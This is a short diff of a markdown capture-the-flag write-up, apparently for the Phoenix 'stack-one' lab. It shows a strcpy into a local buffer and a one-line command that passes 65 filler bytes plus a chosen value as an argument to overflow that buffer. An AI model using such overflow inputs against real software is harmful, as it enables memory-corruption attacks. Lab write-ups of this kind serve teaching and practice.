waqarNaeem786/ctfs/phoenix.md

    strcpy(locals.buffer, argv[1]);
   ```

-  ==Note==: The file takes the input as the argument so we can not pass as the pipe it will give us the error instead we will do this:
+  **Note**: The file takes the input as the argument so we can not pass as the pipe it will give us the error instead we will do this:
   ```
   /stack-one $(python -c 'print("A" * 65 + "\x62\x59\x6c\x49")')